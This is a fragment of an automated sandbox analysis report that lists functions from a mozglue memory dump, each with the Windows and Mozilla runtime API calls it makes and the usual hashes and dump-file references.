                                                                                                                                                                                                                                      • Instruction ID: e02ab4c77900fcdf9626145eaea4ddecddb25a14e8b8b2fd7ebbd5d1387874d1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68e7aa94a22f1a6ba49b85ccd573ba3476b2ea276ead14778af11fdb660a362b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4961D072A083449FCB10CF38C58165BB7E5EF8A344F444B6EF88997251EB38DA95C782
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(0000000C,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60A72
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60AF5
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60B9F
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60BDB
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60BED
                                                                                                                                                                                                                                      • mozalloc_abort.MOZGLUE(alloc overflow,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60C0A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$moz_xmalloc$mallocmozalloc_abort
                                                                                                                                                                                                                                      • String ID: alloc overflow
                                                                                                                                                                                                                                      • API String ID: 1471638834-749304246
                                                                                                                                                                                                                                      • Opcode ID: 66659d40c2f8159808d0678e2be8b6cc8036c323e4f03420eed54109ba857ffa
                                                                                                                                                                                                                                      • Instruction ID: 47ddc0b3812bb0f1a7b7c103bdfbe1311fb816372f70490edb4fef37592ca87d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66659d40c2f8159808d0678e2be8b6cc8036c323e4f03420eed54109ba857ffa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9519EB4A042068FDF24CF68C8C0A6EB3B6FF54388F15896DC85A9B205FB75A5D4CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • free.MOZGLUE(?,6BAD008B), ref: 6BA57B89
                                                                                                                                                                                                                                      • free.MOZGLUE(?,6BAD008B), ref: 6BA57BAC
                                                                                                                                                                                                                                        • Part of subcall function 6BA578C0: free.MOZGLUE(?,6BAD008B), ref: 6BA57BCF
                                                                                                                                                                                                                                      • free.MOZGLUE(?,6BAD008B), ref: 6BA57BF2
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BA75EDB
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: memset.VCRUNTIME140(6BAB7765,000000E5,55CCCCCC), ref: 6BA75F27
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BA75FB2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$CriticalSection$EnterLeavememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3977402767-0
                                                                                                                                                                                                                                      • Opcode ID: df4856b1696053a678b5d68cff01b6d85022ee24e68e34945ecf06c773091c8e
                                                                                                                                                                                                                                      • Instruction ID: 7ec4303f2573e155c7ffe14e2b5b307601ff031b77def432b01bfc6cb935d786
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df4856b1696053a678b5d68cff01b6d85022ee24e68e34945ecf06c773091c8e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28C18B73E011288BEF248B28CD90B9DB772AF41314F1582A9D51ABB381D7399FD58F52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAA124B
                                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BAA1268
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAA12DA
                                                                                                                                                                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6BAA134A
                                                                                                                                                                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6BAA138A
                                                                                                                                                                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6BAA1431
                                                                                                                                                                                                                                        • Part of subcall function 6BA98AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BAB1563), ref: 6BA98BD5
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BAA145A
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BAA146C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2803333873-0
                                                                                                                                                                                                                                      • Opcode ID: 8c8d45486af43a03eb0b117f1b3a4081e6daa44eabd85a22520db4d46191f45b
                                                                                                                                                                                                                                      • Instruction ID: 4e7d8e7b8baccc90b1406d1fac632c0f7677fc79d5a416358b87101f594fb6ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c8d45486af43a03eb0b117f1b3a4081e6daa44eabd85a22520db4d46191f45b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A361CF75908340ABDF10DF24C990BAAB7F5FFC6308F04891DE99947212EB39E485CB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6BA54667,?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54C63
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6BA54667,?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54C89
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6BA54667,?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54CAC
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54CCF
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54CF2
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54D15
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54D38
                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6BA54667,?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54DD1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1497960986-0
                                                                                                                                                                                                                                      • Opcode ID: 2d42aafbb58e0ac63e765fe4ab64176af50e951bcc13348ae2a2763c416f97f2
                                                                                                                                                                                                                                      • Instruction ID: aeffb1715a7c4d498326af34ec7dfd635e471b6ddc3e214a22be118f29c19043
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d42aafbb58e0ac63e765fe4ab64176af50e951bcc13348ae2a2763c416f97f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2451A973504A408FEB348A3DD96475677A2AF41728F444A1CE097CBBD5DB39E6F48702
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,6BA61999), ref: 6BA5EA39
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6BA5EA5C
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6BA5EA76
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(-00000001,?,?,6BA61999), ref: 6BA5EA9D
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6BA61999), ref: 6BA5EAC2
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6BA5EADC
                                                                                                                                                                                                                                      • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6BA5EB0B
                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6BA5EB27
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 706364981-0
                                                                                                                                                                                                                                      • Opcode ID: 86fbd96494229f6b05d5a9576ef1aa9ab72964b02066fbe2b745c6ed804b911a
                                                                                                                                                                                                                                      • Instruction ID: 2c0254097c363d0fb66177297a4d79c099ce85a8d3fa2f9e64b0e00703c43934
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86fbd96494229f6b05d5a9576ef1aa9ab72964b02066fbe2b745c6ed804b911a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5541E1B2A00215DFDF14CF78DC81AAE77A5FF40224F240628E915D7394E734DA9087E1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAAD36B
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAAD38A
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD39D
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD3E1
                                                                                                                                                                                                                                      • free.MOZGLUE ref: 6BAAD408
                                                                                                                                                                                                                                        • Part of subcall function 6BA8CBE8: GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
                                                                                                                                                                                                                                        • Part of subcall function 6BA8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAAD44B
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD457
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6BAAD472
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3843575911-0
                                                                                                                                                                                                                                      • Opcode ID: 8c4bd4a4c50fdc6a312f892e34302a80bfb379eb63f4ff0ed79627f4b74771ff
                                                                                                                                                                                                                                      • Instruction ID: 92f908e31b45f7a75168b5fb39cd1ddeb46143e5454c5d28e30a04fedb30ff57
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c4bd4a4c50fdc6a312f892e34302a80bfb379eb63f4ff0ed79627f4b74771ff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A41EF755043059FCB10DF64C489A9EBBB5FF85314F108A2EE9A287340EB79E985CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6BAB7ABE), ref: 6BA6985B
                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6BAB7ABE), ref: 6BA698A8
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000020), ref: 6BA69909
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000023,?,?), ref: 6BA69918
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BA69975
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1281542009-0
                                                                                                                                                                                                                                      • Opcode ID: 04d06da5da19a730a4b8b238d21f42946ce669599ec06731e22816fb27be792a
                                                                                                                                                                                                                                      • Instruction ID: 8443c97355908e71d9532dfa682c0f8eac2726a6d9ee3a99df72eb6352c80b28
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04d06da5da19a730a4b8b238d21f42946ce669599ec06731e22816fb27be792a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7719AB56047058FCB24CF28C58095AB7F1FF4E3647144AA9D85ACB7A1E735F882CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6BAACC83,?,?,?,?,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BA6B7E6
                                                                                                                                                                                                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6BAACC83,?,?,?,?,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BA6B80C
                                                                                                                                                                                                                                      • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6BAACC83,?,?,?,?,?,?,?,?,?,6BAABCAE), ref: 6BA6B88E
                                                                                                                                                                                                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6BAACC83,?,?,?,?,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BA6B896
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 922945588-0
                                                                                                                                                                                                                                      • Opcode ID: cef1fc62e79218e9bc6d3e296aeeffa3e9e755c8e6eb2632bd80e0024fb0aaf0
                                                                                                                                                                                                                                      • Instruction ID: 0ffba83f323ad053ee85a35eb23440412b55bf95a7ff9e813b3e1e3fb320cdac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cef1fc62e79218e9bc6d3e296aeeffa3e9e755c8e6eb2632bd80e0024fb0aaf0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7451BF75B046008FCB25CF58C494A2AB7F1FF8D354B99865DE99A87351D735EC42CB80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BA94AB7,?,6BA543CF,?,6BA542D2), ref: 6BA94B48
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,80000000,?,6BA94AB7,?,6BA543CF,?,6BA542D2), ref: 6BA94B7F
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BA94AB7,?,6BA543CF,?,6BA542D2), ref: 6BA94B94
                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BA94AB7,?,6BA543CF,?,6BA542D2), ref: 6BA94BBC
                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6BA94AB7,?,6BA543CF,?,6BA542D2), ref: 6BA94BEE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
                                                                                                                                                                                                                                      • String ID: pid:
                                                                                                                                                                                                                                      • API String ID: 1916652239-3403741246
                                                                                                                                                                                                                                      • Opcode ID: d64b4f8f8713c2d5fdf95df56e1a4f8f349acbdeae429086348c2d8290bedbcf
                                                                                                                                                                                                                                      • Instruction ID: 427c905442050544f6d33fe171fdfb4976d3a4ae58283fdf32db7e0270bf26a9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d64b4f8f8713c2d5fdf95df56e1a4f8f349acbdeae429086348c2d8290bedbcf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB41F671B043159BCF24DEBCEC8099FBBEAEF85224B144638E869D7381DB349944C7A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADE220,?), ref: 6BABBC2D
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADE220), ref: 6BABBC42
                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,6BACE300), ref: 6BABBC82
                                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(6BADE210), ref: 6BABBC91
                                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(6BADE208), ref: 6BABBCA3
                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,6BADE21C), ref: 6BABBCD2
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BABBCD8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3047341122-0
                                                                                                                                                                                                                                      • Opcode ID: b27edcb0d648037ec5c280cf8bfc3ebdcaf949d0b339b0823c5ceab82fe50fb2
                                                                                                                                                                                                                                      • Instruction ID: f6cb54e8212160e15a54d9ff09dac49e4191efd2670e7bd62a29be5d88228ec2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b27edcb0d648037ec5c280cf8bfc3ebdcaf949d0b339b0823c5ceab82fe50fb2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1121B1725003049FEB20CF16C8C0B66B7ADFF4A614F44856DE4695B610CB79F881CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADE220,?,?,?,?,6BA63899,?), ref: 6BA638B2
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADE220,?,?,?,6BA63899,?), ref: 6BA638C3
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,6BA63899,?), ref: 6BA638F1
                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6BA63920
                                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6BA63899,?), ref: 6BA6392F
                                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6BA63899,?), ref: 6BA63943
                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6BA6396E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
